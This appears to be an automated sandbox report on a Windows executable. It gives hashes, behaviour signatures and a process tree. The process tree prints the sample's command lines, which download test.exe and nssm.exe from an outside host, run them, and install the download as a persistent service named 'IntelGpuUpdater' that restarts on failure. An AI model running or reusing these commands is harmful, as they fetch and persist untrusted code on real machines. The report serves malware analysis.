Analysis

  • max time kernel
    16s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    04-12-2024 19:53

General

  • Target

    f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe

  • Size

    5.3MB

  • MD5

    37bc24bd5ce2067bdb0c34c0ca414c00

  • SHA1

    3d7b67e7370d79533cb984330f21e5f5c5b9479a

  • SHA256

    f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185d

  • SHA512

    bf4fe4f5139bd206792b645509aaf42be2d58d3f003a497c799bbd3d860ec5c9193f781e4d1525ddd9f7798f8395d21e96ed74ceeb52c0ab43df3d642758ad8a

  • SSDEEP

    98304:aOQGc830HeOIk0ons6U523lPWZIERFog7icldle+HJFD:hrj30qkXnsr2YIIog7if+HJF

Score
5/10

Malware Config

Signatures

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe
    "C:\Users\Admin\AppData\Local\Temp\f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:764
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && " > NUL 2>&1
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2912
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2344
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cmd /c "curl https://dontuseme.ct8.pl/test.exe > %localappdata%\test.exe && start %localappdata%\test.exe && timeout 5 && del %localappdata%\test.exe" > NUL 2>&1
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "curl https://dontuseme.ct8.pl/test.exe > C:\Users\Admin\AppData\Local\test.exe && start C:\Users\Admin\AppData\Local\test.exe && timeout 5 && del C:\Users\Admin\AppData\Local\test.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2368
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000" > NUL 2>&1
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2384
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:1080
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c pause
      2⤵
      • System Location Discovery: System Language Discovery
      PID:988

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/764-0-0x0000000000DA9000-0x00000000010D2000-memory.dmp

    Filesize

    3.2MB

  • memory/764-10-0x0000000000250000-0x0000000000251000-memory.dmp

    Filesize

    4KB

  • memory/764-11-0x0000000000DA0000-0x0000000001627000-memory.dmp

    Filesize

    8.5MB

  • memory/764-8-0x0000000000250000-0x0000000000251000-memory.dmp

    Filesize

    4KB

  • memory/764-6-0x0000000000250000-0x0000000000251000-memory.dmp

    Filesize

    4KB

  • memory/764-5-0x0000000000140000-0x0000000000141000-memory.dmp

    Filesize

    4KB

  • memory/764-3-0x0000000000140000-0x0000000000141000-memory.dmp

    Filesize

    4KB

  • memory/764-1-0x0000000000140000-0x0000000000141000-memory.dmp

    Filesize

    4KB

  • memory/764-12-0x0000000000DA0000-0x0000000001627000-memory.dmp

    Filesize

    8.5MB

  • memory/764-13-0x0000000000DA0000-0x0000000001627000-memory.dmp

    Filesize

    8.5MB

  • memory/764-14-0x0000000000DA9000-0x00000000010D2000-memory.dmp

    Filesize

    3.2MB